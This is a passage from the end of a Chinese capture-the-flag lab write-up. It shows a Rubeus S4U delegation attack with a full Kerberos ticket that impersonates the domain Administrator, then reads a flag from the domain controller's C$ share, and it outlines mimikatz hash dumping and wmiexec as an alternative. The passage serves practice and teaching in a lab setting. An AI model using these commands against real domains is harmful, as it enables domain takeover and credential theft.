BzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAlm+72NS+JgLfI/t46o2+/oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMTIwMTA5NTI1MVqmERgPMjAyMzEyMDExOTUyNTFapxEYDzIwMjMxMjA4MDk1MjUxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==


Rubeus.exe s4u /impersonateuser:Administrator /msdsspn:CIFS/DC.xiaorang.lab /dc:DC.xiaorang.lab /ptt /ticket:doIFmjCCBZagAwIBBaEDAgEWooIEqzCCBKdhggSjMIIEn6ADAgEFoQ4bDFhJQU9SQU5HLkxBQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMeGlhb3JhbmcubGFio4IEYzCCBF+gAwIBEqEDAgECooIEUQSCBE3/H+sjb8wrOjmA7MwgAWhzuXgbzwcdEVuPPx699IqXQk5/go33MTZTD4wcHptgPXOWldQ3VDLBNCzlFkIbUOgNdL4i43Wx5tnpFek764ostGPycCTUeo5BLB5DYId47iMwbXaRhQHcDscixGzb8+jkwrtj0SqtDNUBs07c5HwN0D79KTiMhlp2vnVTQ1RiNUhfwagUPGdRBGm5wMUGRg+kjnZA6CvtyPjJVNIFjQ5fWIelw3t2zknmeApNLZF9hMuhjUk5OuxkSbYOLxNBAjLiiAH86jf7I+/eTldVHWl3hL3eunXsYUg5VuWp/P2gr17shejmk1yv+brsF5rxSf2fc/TUvnmaYTsT3m0swq6SHgiNrri90kGrA6l9k004o+8FYhzosuxGWx1DYhVeM9zkrYI4AK7jydor4jvRdbxVbQW4uNS6UvUg+wJuO5lrtKD5RJ4dwYBWRndupxHDmXZjIiANA/En/i96DwfyNWYd/EgqgSc3uzq/DM8pDnFEix0rmbedL41uElqP7qDrZQKtZMMxClwinvbHeskfVNu8nbM3xrUDOYogLZaZCf6nxzlD3vpempkutXl7hc9zrPa41UfrLe81g+OfKVpdolKC1vfO5EVScie/fC1CK7Y1ZaiyVo9q5LU7J7s7VWPEW0J0OAN5afyZCO3F/V23F3quPT2rvjijmwe0aGvV75m+xmNHrEL/h7kYpD4aY8OVWxzxY7EK74BLKxEYD03nSqjxFIFiu4I2eA9m1Ud/x/xf+MHPWGS3HwPiwUR7B+aPvw9keE/7ijC5BnQOXmYgUi6CDCkvZ6AvKE3W33ekIbn7KbVpLnbApD4B1EQlUfpnguCT02wBXGiBHsvsoDgOhn1ebe6HuguGDJX5euHOzCcffCrhspwVCkaYtdBUQ2ScbMtdkBtYymgWfOBbyWgIpcdIjA/gG/WoMCmcWwchK/nasOqQHwEdoItyIs0ThzAtJuiIZGnnYKBtcbmP+6RHdvMEx/5poRMdTvATCS/do3qCdKxVj/Jhzah1z+c7h/RXM08ntXkqmPjDFWws1RxsGdTvQZXWahJuW4eM3YS8KcNU/icUt6nvHg4GhgGg+/a/EHv6zfEKb3wiX1a04njR4t6mWXLXgxjsls7HTG0WeZ61db+myM0uDGSSLlJme4B+eRdu5C2Uvb3ja86xIjrtBOXphpe7YvH1MF+rDh1zqtv9eTmwVB8oaksqgdI6r5DEex/H5JKQRJXnskS2eMsVppmO2EtF5cGReTjJtOxrwdW+SnZykPz1uOR0OVK4O7nxp+JugxkcE7Kzj41dDR5rRxNNC05mHEE2O/TAMIosuok0dfeg+hPLZS7KxJHq1XvV97sqVT5uYimWoyCFORAh9La5DMh4alv5tYHAl3awLCT0X1K/44FL5qG73w07KQyB9TTP4HvAdroyyTtqZvMpxcxEwliStMcBhldo0hOXk1ijgdowgdegAwIBAKKBzwSBzH2ByTCBxqCBwzCBwDCBvaAbMBmgAwIBF6ESBBAlm+72NS+JgLfI/t46o2+/oQ4bDFhJQU9SQU5HLkxBQqIZMBegAwIBAaEQMA4bDE1TU1FMU0VSVkVSJKMHAwUAQOEAAKURGA8yMDIzMTIwMTA5NTI1MVqmERgPMjAyMzEyMDExOTUyNTFapxEYDzIwMjMxMjA4MDk1MjUxWqgOGwxYSUFPUkFORy5MQUKpITAfoAMCAQKhGDAWGwZrcmJ0Z3QbDHhpYW9yYW5nLmxhYg==

image-20231201175554908

拿下域控读取flag
1
type \\DC.xiaorang.lab\C$\Users\Administrator\flag\flag04.txt

image-20231201175615320

或者————————-
拿到票据
注入票据
然后mimikatz再dump
拿到hash,然后直接wmiexec拿到flag

总结:

总结一下打靶是遇到的问题吧,耽误了不少时间。wpscan用之前要更新。。adminer.php连接不了mysqli数据库,失败。蚁剑连接mysqli数据库。win下双引号和单引号的差别。Rubeus.exe是直接这个可执行文件还是点斜杠执行。Rubeus.exe可执行文件仓库。

 Comments